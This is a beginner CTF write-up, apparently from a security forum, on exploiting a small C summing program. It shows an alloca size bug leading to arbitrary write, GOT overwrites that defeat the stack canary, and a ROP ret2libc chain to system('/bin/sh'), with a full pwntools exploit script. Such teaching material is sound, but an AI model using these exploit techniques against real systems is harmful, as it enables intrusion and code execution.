Punishing code with magic numbers with ROP and ret2libc on an x86_64

Difficulty: Beginner

CTF: /zer0pts/pwn/protude (ASLR is enabled here)

The vulnerable program

This program takes an integer N and N other integers as input. Then it calculates and prints the sum of these numbers.
A pretty standard exercise when you are learning a new programming language.

We are going to attempt to exploit it to get RCE. Take a few moments to absorb the code before moving on.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

long n;

long read_long() {
  char buf[32];
  int readByte;
  memset(buf, 0, sizeof(buf));          // sets memory to 0
  readByte = read(0, buf, sizeof(buf)); // reads up to 32 bytes of input
  if (readByte == 0) {
    puts("[ERROR] read failed");        // no bytes read = exit()
    exit(1);
  }
  return atol(buf);                     // convert input to long
}

void setup() {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);
}

void calc_sum(void) {
  long i;
  long *array;
  long result;
  
  array = (long*)alloca(n * 4);       

  for(i = 0; 0 <= i && i < n; i++) {
    printf("num[%ld] = ", i + 1);
    array[i] = read_long();
  }

  for(result = 0, i = 0; i < n; i++) {
    result += array[i];
  }

  printf("SUM = %ld\n", result);
}

int main() {
  setup();
    
  printf("n = ");
  n = read_long();
  if (n <= 0x00 || n > 22) { // size has to be 1-22
    puts("Invalid input");
  } else {
    calc_sum();
  }
  return 0;
}

Setup

Let’s set up a few things before we start:

  • Disable ASLR
    echo 0 > /proc/sys/kernel/randomize_va_space
    
  • Disable PIE (during compilation)
  • Enable DEP (during compilation)
  • Enable stack protector (during compilation)

The binary is provided to you here.

Static Analysis

Inspecting code that handles user input.

Let’s take a closer look at the user input function.

long read_long() {
  char buf[32];
  int readByte;
  memset(buf, 0, sizeof(buf));          // sets memory to 0
  readByte = read(0, buf, sizeof(buf)); // reads up to 32 bytes of input
  if (readByte == 0) {
    puts("[ERROR] read failed");        // no bytes read = exit()
    exit(1);
  }
  return atol(buf);                     // convert input to long
}

We have a buffer of 32 bytes. read(0, buf, sizeof(buf)) reads at most 32 characters. Therefore, there is no way to overwrite the stack using read. : (

We have an interesting call to atol(buf) at the end, but we cannot get anything out of it. The function simply returns 0 when the input does not start with a number (an empty line, for example).
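
To make the "returns 0" behaviour concrete, here is a rough Python model of atol. It is only an approximation for illustration, not glibc's implementation: atol_like is a made-up name, and overflow handling is ignored.

```python
import re

def atol_like(buf: bytes) -> int:
    """Approximate C atol(): skip whitespace, optional sign, leading digits."""
    # A C string ends at the first NUL byte.
    text = buf.split(b"\x00", 1)[0].decode("latin-1")
    match = re.match(r"[ \t\n\v\f\r]*([+-]?[0-9]+)", text)
    # No leading number means no conversion, which yields 0.
    return int(match.group(1)) if match else 0

print(atol_like(b"\n"))      # an empty line
print(atol_like(b"14\n"))    # a plain number
print(atol_like(b"abc"))     # garbage
```

This is why sending an empty line to the program stores a 0, which comes in handy later.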

Although the function implementation uses bad practices, we don’t have anything interesting going on.

Inspecting the function that calculates the sum.

void calc_sum(void) {
  long i;
  long *array;
  long result;
  
  array = (long*)alloca(n * 4);       

  for(i = 0; 0 <= i && i < n; i++) {
    printf("num[%ld] = ", i + 1);
    array[i] = read_long();
  }

  for(result = 0, i = 0; i < n; i++) {
    result += array[i];
  }

  printf("SUM = %ld\n", result);
}

If you are unfamiliar with alloca, run man 3 alloca to check its manual page.

The alloca() function allocates size bytes of space in the stack frame of the caller. This temporary space is automatically freed when the function that called alloca() returns to its caller

alloca allocates memory in the stack frame of the caller, in this case, calc_sum.

This is an interesting choice. Usually, people use malloc to allocate space at runtime. But in this case, since n is bound to 1-22, it is not too bad: not much stack space is used.

Then, the N integers read by read_long() are placed in the memory we allocated.
The sum is calculated and the result is printed. Not much going on here either.

If you want to figure out the vulnerability on your own, stop here.

Introducing magic numbers

The term magic number or magic constant refers to the anti-pattern of using numbers directly in source code

The use of magic numbers is often frowned upon. They make your code difficult to understand and often introduce subtle bugs.

Take a look at the following piece of code from Wikipedia.

   for i from 1 to 52
       j := i + randomInt(53 - i) - 1
       a.swapEntries(i, j)

52 and 53 (like most other numbers that have no meaning in the local context) are magic numbers.
In the case above, the only problem this poses is a slight annoyance over the mysterious 52. Cases like the following, however, may create portability issues.

const int array_size = 20;
int *ptr = (int*) malloc(array_size * 4);

Here, 4 is the magic number. The piece of code above executes properly on systems where sizeof (int) == 4. But if it is 2, it breaks miserably when we attempt to use ptr.

If we were to write this properly, we would use something like:

const int array_size = 20;
int *ptr = (int*) malloc(array_size * sizeof (int));
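
If you want to check what your own platform uses, a quick sketch with Python's ctypes module prints the sizes of a few C types. The values depend on the machine and ABI you run it on, so treat the output as local to your system.

```python
import ctypes

# These sizes are chosen by the platform ABI, not fixed by the C language.
sizes = {
    "char": ctypes.sizeof(ctypes.c_char),
    "int": ctypes.sizeof(ctypes.c_int),
    "long": ctypes.sizeof(ctypes.c_long),
}

for name, size in sizes.items():
    print(f"sizeof({name}) = {size}")
```

Any size that is not 4 on your machine is a size that the hardcoded 4 gets wrong.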

Okay, now you are equipped with the knowledge of magic numbers! Let us approach this problem again.

Finding an arbitrary write.

Take a look at:

  array = (long*) alloca(n * 4);       

This is the exact portability issue that we discussed earlier.
Only sizeof(char) is fixed as 1 by the C standard. Every other type only has a minimum size requirement, and the implementation chooses the actual size.
On x86_64 Linux, compilers usually make sizeof(long) == 8. This is convenient because a long then fits exactly in a register.

In this case, sizeof(long) == 8

So we have allocated space like alloca(n * 4); yet the sizeof(long) == 8 (In x86_64, this is usually the case).

Therefore, we are only allocating enough memory for n/2 longs. Yet, we access all n of them. We are accessing memory not allocated for us! Also, we can write to that memory.
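
The shortfall is easy to put into numbers. The sketch below assumes sizeof(long) == 8 and ignores the rounding that a real alloca applies for stack alignment; alloca_shortfall is just an illustrative helper name.

```python
def alloca_shortfall(n, magic=4, sizeof_long=8):
    """Return (bytes allocated, bytes needed, longs that actually fit)."""
    allocated = n * magic          # what alloca(n * 4) asks for
    needed = n * sizeof_long       # what n longs really occupy
    return allocated, needed, allocated // sizeof_long

for n in (1, 21, 22):
    allocated, needed, fit = alloca_shortfall(n)
    print(f"n={n}: allocated {allocated} bytes, needed {needed} bytes, "
          f"only {fit} of {n} longs fit")
```

For n = 21 this gives 84 bytes requested against 168 bytes written, so roughly the upper half of the array lands on whatever sits above the buffer.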

Even more convenient is the fact that alloca was used. The extra memory we are addressing is on the stack.

The stack frame will usually look like this for the calc_sum function.

-----------------------------------------
|      Arguments to the function        |
-----------------------------------------
|           Return Address              |
-----------------------------------------
|      Local variables of calc_sum      |
-----------------------------------------
|          Alloca(n*4) buffer           |
-----------------------------------------

We can potentially overwrite the local variable array to achieve arbitrary write!

Exploiting the arbitrary write once.

Let’s fire up gdb:

gdb-peda$ r
n = 21
num[1] = 
num[2] = 
num[3] = 
num[4] = 
... 
num[15] = 
num[2] = 

We use n = 21. Note that n is restricted to 1-22 (re-read the code if you are confused).

I just pass it empty strings so that num[1] through num[15] will be equal to 0.

We notice that after num[15], we loop back to num[2].
We have overwritten the local variable i!

Since we have overwritten the local variable i with 0, we again start the loop from 2. (i++ is done at the end and printf() uses i+1).

We are looping indefinitely.

But, looping indefinitely is not useful to us.
To write to memory beyond this, we overwrite i with 14 (exactly the current index),
so that in the next iteration we get to num[16].

gdb-peda$ r
n = 21
num[1] = 
...
num[15] = 14
num[16] = 
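
The two gdb sessions can be replayed with a toy model in Python. It assumes, based on the behaviour observed above for n = 21, that array[14] shares its stack slot with i; run_loop and I_SLOT are names invented for this sketch, and the other locals are ignored.

```python
I_SLOT = 14   # observed above: with n = 21, array[14] aliases the variable i

def run_loop(inputs, n=21, max_steps=40):
    """Replay calc_sum's input loop; return the num[...] prompts printed."""
    slots = [0] * 32              # the stack viewed as 8-byte slots from array[0]
    values = iter(inputs)
    prompts = []
    for _ in range(max_steps):
        i = slots[I_SLOT]         # i is re-read from its stack slot
        if not (0 <= i < n):
            break
        prompts.append(i + 1)     # printf("num[%ld] = ", i + 1)
        value = next(values, None)
        if value is None:
            break                 # simulated input exhausted
        slots[i] = value          # array[i] = read_long()
        slots[I_SLOT] += 1        # i++
    return prompts

print(run_loop([0] * 15)[-2:])          # empty lines only
print(run_loop([0] * 14 + [14])[-2:])   # num[15] = 14
```

With empty lines only, the last two prompts are num[15] and num[2]; with 14 as the fifteenth input they are num[15] and num[16], matching the sessions above.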

We can now write past the limit and overwrite the array pointer itself (with num[17])! The iteration after that then writes to array[17], that is, *(array + 17), using the new pointer. Since we control array, we can write anywhere we wish.

Let’s try to overwrite printf's GOT entry so that it points to the puts() call in the code, to test things.

First, we get the GOT entry of printf.

gdb-peda$ x/i printf
   0x400690 <printf@plt>:
    jmp    QWORD PTR [rip+0x20099a]        #0x601030

0x601030 is the address of printf's GOT entry.

We then get the location where the puts call is made.

gdb-peda$ disass read_long
Dump of assembler code for function read_long:
   0x00000000004007c7 <+0>:     push   rbp
   0x00000000004007c8 <+1>:     mov    rbp,rsp
   ...
   0x0000000000400813 <+76>:    lea    rdi,[rip+0x28a]        # 0x400aa4
   0x000000000040081a <+83>:    call   0x400660 <puts@plt>
   ...
   End of assembler dump.

0x000000000040081a is the place we want the GOT entry to point to.

So we overwrite the value at 0x601030 with 0x000000000040081a

gdb-peda$ r
n = 21
num[1] =
...
num[15] = 14
num[16] = 
num[17] = 6295464
num[18] = 4196378
num[%ld] = 
[Inferior 1 (process 16567) exited with code 01]

As you can see, num[%ld] = was printed without formatting. Awesome.
printf@plt jumped to call puts@plt (and then to the call exit@plt after it).

But wait a minute…
The careful reader might have noticed that
0x601030 = 6295600
but we used 6295464 in gdb, which is 0x601030 - 17*8.

Why so?
This is because the next iteration writes to array[17], not array[0]. We therefore correct the address by subtracting 17 * sizeof(long).

With this, we have achieved arbitrary write!!
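
Here is the same write replayed on a small memory model in Python, as a sanity check of the arithmetic. The slot numbers (i at array[14], the array pointer at array[16]) are taken from the behaviour seen in gdb for n = 21; the stack base address, simulate and biased are made up for the sketch.

```python
WORD = 8                      # sizeof(long) on this target
I_SLOT, PTR_SLOT = 14, 16     # observed above for n = 21

def biased(target, index=17):
    """Pointer value to plant so that array[index] lands on target."""
    return target - index * WORD

def simulate(inputs, base=0x7FFFFFFFD000, n=21):
    """Replay the input loop on a dict-based memory; base is hypothetical."""
    i_addr = base + I_SLOT * WORD
    ptr_addr = base + PTR_SLOT * WORD
    mem = {i_addr: 0, ptr_addr: base}
    for value in inputs:
        i = mem[i_addr]
        if not (0 <= i < n):
            break
        mem[mem[ptr_addr] + i * WORD] = value   # array[i] = read_long()
        mem[i_addr] += 1                        # i++
    return mem

PRINTF_GOT = 0x601030
CALL_PUTS = 0x40081A
mem = simulate([0] * 14 + [14, 0, biased(PRINTF_GOT), CALL_PUTS])
print(biased(PRINTF_GOT), hex(mem[PRINTF_GOT]))
```

The planted pointer comes out as 6295464, and the final write ends up exactly at 0x601030.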

As of right now, we can only write to memory once. But, it is still a step in the right direction.

Overwriting memory more than once.

In order to overwrite arbitrary memory more than once, we need to find a way to jump to the top of the calc_sum() function whenever we want.
We will do this with a GOT entry overwrite.

Take a look at the following code from read_long.

  readByte = read(0, buf, sizeof(buf)); // reads up to 32 bytes of input
  if (readByte == 0) {
    puts("[ERROR] read failed");        // no bytes read = exit()
    exit(1);
  }

Bring up the man page of read: man 2 read.

On success, the number of bytes read is returned (zero indicates the end of file)

The if block only executes when we provide EOF to the input stream. If we overwrite either the puts or the exit GOT entry to point to the top of the calc_sum function, we can send an EOF to jump to the top of the function. This will allow us to overwrite regions of memory multiple times.

The relevant info:

calc_sum = 0x40088e = 4196494
puts@got.plt = 0x601018 

Again, we need to correct the address 0x601018 so that array[17] points to it.

0x601018 - 17*8 = 6295440
gdb-peda$ r
n = 21
num[1] = 
...
num[15] = 14
num[16] = 
num[17] = 6295440
num[18] = 4196494
num[19] = num[1] = 

I used CTRL + D to send an EOF to the terminal. We can see the output num[1]: we jumped to the start of calc_sum again!
We can use this to overwrite memory any number of times.

ROP and ret2libc

In this challenge, we have DEP, which prevents code on the stack from being executed, and stack cookies, which check whether the stack frame has been overwritten.

Most of the time, we do not have a space in a process that is both writable and executable.
For instance let’s check for our current executable.

$ ./thebinary &
n =                                 
$ ps aux | grep thebinary
gnik     16890  0.0  0.0  10696  1040 pts/1    t    16:01   0:00 /home/gnik/thebinary
$ pmap 16890
16890:   /home/gnik/thebinary
0000000000400000      4K r-x-- thebinary
0000000000600000      4K r---- thebinary
0000000000601000      4K rw--- thebinary
00007ffff73ba000    104K r-x-- libpthread-2.27.so
00007ffff73d4000   2044K ----- libpthread-2.27.so
00007ffff75d3000      4K r---- libpthread-2.27.so
00007ffff75d4000      4K rw--- libpthread-2.27.so
00007ffff75d5000     16K rw---   [ anon ]
00007ffff75d9000     12K r-x-- libdl-2.27.so
00007ffff75dc000   2044K ----- libdl-2.27.so
00007ffff77db000      4K r---- libdl-2.27.so
00007ffff77dc000      4K rw--- libdl-2.27.so
00007ffff77dd000   1948K r-x-- libc-2.27.so
00007ffff79c4000   2048K ----- libc-2.27.so
00007ffff7bc4000     16K r---- libc-2.27.so
00007ffff7bc8000      8K rw--- libc-2.27.so
00007ffff7bca000     16K rw---   [ anon ]
00007ffff7bce000     24K r-x-- libgtk3-nocsd.so.0
00007ffff7bd4000   2044K ----- libgtk3-nocsd.so.0
00007ffff7dd3000      4K r---- libgtk3-nocsd.so.0
00007ffff7dd4000      4K rw--- libgtk3-nocsd.so.0
00007ffff7dd5000    156K r-x-- ld-2.27.so
00007ffff7fbe000     16K rw---   [ anon ]
00007ffff7ff7000     12K r----   [ anon ]
00007ffff7ffa000      8K r-x--   [ anon ]
00007ffff7ffc000      4K r---- ld-2.27.so
00007ffff7ffd000      4K rw--- ld-2.27.so
00007ffff7ffe000      4K rw---   [ anon ]
00007ffffffde000    132K rw---   [ stack ]
ffffffffff600000      4K r-x--   [ anon ]
 total            10700K

As you can see, none of them have both the write and execute bit set.

This is a pretty common security measure, so we cannot write shellcode to a certain memory region and jump to it.

This is where ret2libc and ROP come into play.

With ret2libc, we jump to certain points in the libc library that is loaded at runtime. For instance, we can jump to potentially dangerous functions like system(), which is present in libc.

With ROP, we jump to small code segments in the address space of the process, each of which performs a certain task before jumping to a different segment. Chaining a bunch of these ROP gadgets can hence be very powerful.

Our plan to achieve RCE is as follows:

  • Find the address of system() in libc
  • Find the address of the string '/bin/sh' in libc
  • Find a ROP gadget that can place the address of the /bin/sh string in the rdi register.
  • Jump to system()

Finding the address of system() and the string ‘/bin/sh’ is pretty straightforward.

gdb-peda$ start
....
Temporary breakpoint 1, 0x00000000004009bd in main ()
gdb-peda$ p system
$1 = {int (const char *)} 0x7ffff782c440 <__libc_system>
gdb-peda$ info proc map
process 17653
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      .......
      .......
      0x7ffff77dd000     0x7ffff79c4000   0x1e7000        0x0 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff79c4000     0x7ffff7bc4000   0x200000   0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff7bc4000     0x7ffff7bc8000     0x4000   0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff7bc8000     0x7ffff7bca000     0x2000   0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so
      0x7ffff7bca000     0x7ffff7bce000     0x4000        0x0 
      0x7ffff7bce000     0x7ffff7bd4000     0x6000        0x0 /usr/lib/x86_64-linux-gnu/libgtk3-nocsd.so.0
      .......
      .......
gdb-peda$ find  '/bin/sh' 0x7ffff77dd000 0x7ffff79c4000
Searching for '/bin/sh' in range: 0x7ffff77dd000 - 0x7ffff79c4000
Found 1 results, display max 1 items:
libc : 0x7ffff7990e9a --> 0x68732f6e69622f ('/bin/sh')

The system() function is at 0x7ffff782c440.
The address of the string ‘/bin/sh’ is 0x7ffff7990e9a.

These addresses are most likely different on your machine.
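
What stays the same for a given libc build is the distance from the start of the libc mapping. A small sketch that derives those offsets from the numbers above follows; rebase is a hypothetical helper, and the offsets only hold for this exact libc-2.27 build.

```python
LIBC_BASE = 0x7ffff77dd000   # start of the r-x libc mapping shown above
SYSTEM = 0x7ffff782c440      # p system
BIN_SH = 0x7ffff7990e9a      # find '/bin/sh'

system_off = SYSTEM - LIBC_BASE
bin_sh_off = BIN_SH - LIBC_BASE
print(hex(system_off), hex(bin_sh_off))

def rebase(new_base):
    """Addresses of system() and '/bin/sh' for another load address."""
    return new_base + system_off, new_base + bin_sh_off
```

If your libc is loaded elsewhere but is the same build, rebase(your_base) gives the two addresses to use.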

Learning to write exploit scripts.

Some knowledge of python helps, although it is not necessary to understand this section.

There are a lot of ways to write your exploit scripts.
I will keep things simple and write one using python3 and pwntools.

We will do everything we have done so far with gdb in python.

Create a new python script.

import pwn
import tty

You can install pwntools with pip and import pwn to work with it. We will also be using some constants from tty

p = pwn.process('./thebinary', stdin=pwn.PTY, raw = False)

# g = pwn.gdb.attach(p, """
# """)

This is how you start a local process in pwntools. Note the raw = False and stdin=pwn.PTY!
These options are essential to our current project, since we need to write an EOF to the stream without closing it. (Yes, this sounds weird, but it is necessary.)
You can experiment with attaching the debugger by uncommenting some lines here.
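
To see why a terminal makes this possible, here is a small standalone experiment that does not need pwntools. It assumes a Linux pseudo-terminal with its default (canonical) settings, where the EOF character typed on an empty line makes read() return 0 bytes while the stream stays open.

```python
import os
import tty

# The slave end plays the role of the target's stdin; we type into the master.
master, slave = os.openpty()

# The EOF control character (CTRL + D) followed by a newline.
os.write(master, bytes([tty.CEOF]) + b"\n")

first = os.read(slave, 32)    # EOF char on an empty line: a zero-length read
second = os.read(slave, 32)   # the stream is still open: the newline arrives
print(first, second)

os.close(master)
os.close(slave)
```

With a plain pipe, the only way to make read() return 0 is to close the write end, after which nothing more can be sent.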

def setup():
    p.sendline('21')

def write_junk(count):
    for x in range(count):
        p.sendline('')

def overwrite_memory(addr, data):
    p.sendline('14')
    p.sendline('')
    p.sendline(str(addr))
    p.sendline(str(data))


def send_eof():
    """
    Note Send EOF sends 2 bytes!!!
    """
    p.sendline(chr(tty.CEOF))

These are some of the functions that will be useful to us. The functions are self-explanatory. If you have never written an exploit before with pwntools, feel free to experiment here. p.sendline() is used to send a line to the process.
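
If you want to inspect the exact bytes these helpers produce without starting the process, the following sketch builds them offline. stage_bytes is a made-up name, and unlike overwrite_memory() it takes the real target address and applies the 17 * 8 correction itself.

```python
WORD = 8
PTR_INDEX = 17   # the write lands at array[17] once the pointer is replaced

def stage_bytes(junk, target, data, i_value=14):
    """Bytes for one arbitrary write, after n has already been sent."""
    lines = [""] * junk                          # empty lines are stored as 0
    lines += [
        str(i_value),                            # keep i on track
        "",                                      # skip the slot after i
        str(target - PTR_INDEX * WORD),          # new value for the array pointer
        str(data),                               # value written to target
    ]
    return "".join(line + "\n" for line in lines).encode()

payload = stage_bytes(14, 0x601018, 0x40088e)
print(payload)
```

The tail of the payload is the same 14, empty line, 6295440, 4196494 sequence that was typed into gdb earlier.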


setup()
"""
Overwrite the GOT of puts for the ability to write memory many times
"""
write_junk(14)
# 0x40088e = calc_sum
# 0x601018 = GOT of puts
# Overwrite GOT of puts with calc_sum
overwrite_memory(0x601018 - 17*8, 0x40088e)
send_eof()

p.interactive()

Okay, so now that all that is over, we will first overwrite the GOT entry of puts with calc_sum so that we can use EOF to jump to it again. Our nifty little overwrite_memory() function makes this easier.

The p.interactive() at the end is used to make the process interactive. After this, you can use the terminal for IO.

I recommend you experiment with the script.

Things that are necessary for the exploit to work.

These are some things that will be useful to us as we move on to ROP.

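  1. Overwrite the GOT entry of __stack_chk_fail to point to the leaveq; ret instructions in calc_sum to bypass the stack smashing check.
  2. Overwrite the value of n with 30 so that we can overwrite more memory at once. (This is used in the ROP step later)

I will not show this in gdb since I have already shown you how to overwrite arbitrary memory, and the writeup would be pretty repetitive if I included it. Note that these later stages use write_junk(13) rather than write_junk(14): send_eof() sends the EOF character followed by a newline, and that newline appears to be consumed as num[1] once calc_sum restarts.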

If you are confused, please refer to the code snippet below from the exploit script.

"""
Overwrite the GOT of __stack_chk_fail for beating the stack cookie
"""
write_junk(13)
# 0x601020 = GOT of __stack_chk_fail
# 0x4009b3 = leaveq retq instruction in calc_sum, essentially beating the stack_chk_fail
overwrite_memory(0x601020 - 17*8, 0x4009b3)
send_eof()

"""
Overwrite global n to overwrite more data on the stack
"""
write_junk(13)
# n = 0x6010b0
# Overwrite n with 30
overwrite_memory(0x6010b0 - 17*8, 30)
send_eof()

Finding the necessary ROP gadgets

I use the ROPgadget tool to find the necessary ROP gadgets in the executable. You can use any of the plethora of alternatives available to you. (gdb-peda also has one!)

$ ROPgadget --binary thebinary
...
0x0000000000400a83 : pop rdi ; ret
...
0x0000000000400646 : ret
...

Unique gadgets found: 112

We will need two ROP gadgets, pop rdi; ret and ret.
pop rdi; ret loads the address of the string into the rdi register, and the ret gadget aligns the stack for the movaps instruction. (The reason this is necessary is left as an exercise.)

Writing the final exploit script.

We finally have all the tools that we need to write a final exploit script.

The final exploit script looks something like:

import pwn
import tty

p = pwn.process('./thebinary', stdin=pwn.PTY, raw = False)

#g = pwn.gdb.attach(p, """
#b *0x00000000004009b8
#c
#""")

def setup():
    p.sendline('21')

def write_junk(count):
    for x in range(count):
        p.sendline('')

def overwrite_memory(addr, data):
    p.sendline('14')
    p.sendline('')
    p.sendline(str(addr))
    p.sendline(str(data))


def send_eof():
    """
    Note Send EOF sends 2 bytes!!!
    """
    p.sendline(chr(tty.CEOF))


setup()
"""
Overwrite the GOT of puts for the ability to write memory many times
"""
write_junk(14)
# 0x40088e = calc_sum
# 0x601018 = GOT of puts
# Overwrite GOT of puts with calc_sum
overwrite_memory(0x601018 - 17*8, 0x40088e)
send_eof()


"""
Overwrite the GOT of __stack_chk_fail for beating the stack cookie
"""
write_junk(13)
# 0x601020 = GOT of __stack_chk_fail
# 0x4009b3 = leaveq retq instruction in calc_sum, essentially beating the stack_chk_fail
overwrite_memory(0x601020 - 17*8, 0x4009b3)
send_eof()

"""
Overwrite global n to overwrite more data on the stack
"""
write_junk(13)
# n = 0x6010b0
# Overwrite n with 30
overwrite_memory(0x6010b0 - 17*8, 30)
send_eof()


"""
Overwrite the stack with ROP chain for ret2libc
"""
write_junk(17)
p.sendline('24')
# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))

# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))

# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))

# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))
p.sendline("")
p.interactive()

Most of the script has already been discussed.
Let us focus on the rest that remains.

"""
Overwrite the stack with ROP chain for ret2libc
"""
write_junk(17)
p.sendline('24')
# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))

# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))

# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))

# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))
p.sendline("")
p.interactive()

The first question that needs to be answered: Why have some constants changed?
write_junk(13) was used while overwriting memory the last time, so why is write_junk(17) used this time?

This is because n = 21 in all previous cases, but we have just overwritten n with 30 so that we can overwrite more of the stack. Hence, the offset at which the local variable i is overwritten has changed.
You can experiment with the same method used above to figure out the offset when n = 30.

Okay, now let’s discuss the ROP part of the exploit.

# 0x400a83 : pop rdi ; ret
p.sendline(str(0x400a83))

# /bin/sh = 0x7ffff7990e9a
p.sendline(str(0x7ffff7990e9a))

# 0x00400646 = ret
# This is needed because the movaps instruction must be properly aligned.
p.sendline(str(0x00400646))

# system() = 0x7ffff782c440
p.sendline(str(0x7ffff782c440))

To set up our exploit, we overwrite the stack to the point where we can overwrite the return address.
We then place the address of the pop rdi; ret ROP gadget followed by the address to the /bin/sh string.

When the function returns, it jumps to execute pop rdi; ret. Since the address of the string is on the stack, pop rdi places the address of the string in the rdi register. And then we ret to another address…

… The address we jump to is the address of a ret instruction. The ret gadget is used to align our stack. (This is necessary since the movaps instruction (used by system()) needs the stack to be 16-byte aligned.) ret is a NOP in ROP (a gadget that does nothing).

Note that this might not be necessary if your stack is already 16-byte aligned.

We then place the address of system() on the stack. The ret gadget then pops this address off the stack and jumps to system() in libc.

We have successfully placed the address of the string ‘/bin/sh’ in rdi and then jumped to system()!
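
The chain can be stepped through with a tiny emulator to check both claims: rdi holds the string address on entry to system(), and the extra ret changes the stack alignment. This is only a sketch. RET_SLOT is a hypothetical address for calc_sum's saved return address, chosen to be 8 modulo 16 as it would be after a normal call, and the x86_64 System V ABI expects rsp % 16 == 8 on entry to a function.

```python
POP_RDI_RET = 0x400a83      # pop rdi ; ret
RET = 0x400646              # ret
BIN_SH = 0x7ffff7990e9a     # "/bin/sh" in libc
SYSTEM = 0x7ffff782c440     # system() in libc

def run_chain(chain, ret_slot):
    """Step through the chain; return (rdi, rsp) on entry to system()."""
    stack = {ret_slot + 8 * k: word for k, word in enumerate(chain)}
    rsp, rdi = ret_slot, None
    while True:
        target = stack[rsp]      # ret: pop the next address and jump to it
        rsp += 8
        if target == POP_RDI_RET:
            rdi = stack[rsp]     # pop rdi
            rsp += 8             # the gadget's own ret runs on the next pass
        elif target == SYSTEM:
            return rdi, rsp
        elif target != RET:      # a bare ret gadget needs no extra work
            raise ValueError(hex(target))

RET_SLOT = 0x7fffffffe008        # hypothetical, 8 modulo 16

with_ret = run_chain([POP_RDI_RET, BIN_SH, RET, SYSTEM], RET_SLOT)
without_ret = run_chain([POP_RDI_RET, BIN_SH, SYSTEM], RET_SLOT)
print(hex(with_ret[0]), with_ret[1] % 16)
print(hex(without_ret[0]), without_ret[1] % 16)
```

Under these assumptions, rsp % 16 is 8 on entry to system() with the ret gadget and 0 without it, which is the misalignment that trips movaps.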

Wait… There is more…
Remember we overwrote the GOT entry of __stack_chk_fail so that the stack cookie check would unconditionally return to leaveq; ret.
Since we have overwritten the return address, we have surely overwritten the stack cookie.
Therefore, if we hadn’t overwritten the GOT entry of __stack_chk_fail our exploit would have failed.

Alternatively, we could redirect execution through an overwritten GOT entry instead of the return address, which would avoid this problem.

Putting it all together

$ python3 exploit.py
[+] Starting local process './thebinary': pid 18969
[*] Switching to interactive mode
n = 21
....
....
SUM = -3105548685935727921
$ $ whoami
whoami
gnik

This is my first post here in 0x00sec, so any feedback would be helpful. In an upcoming writeup, we will exploit the same executable but with ASLR enabled. : )

I loved this article! Thanks for sharing! I would love to learn more around similar things :slight_smile:
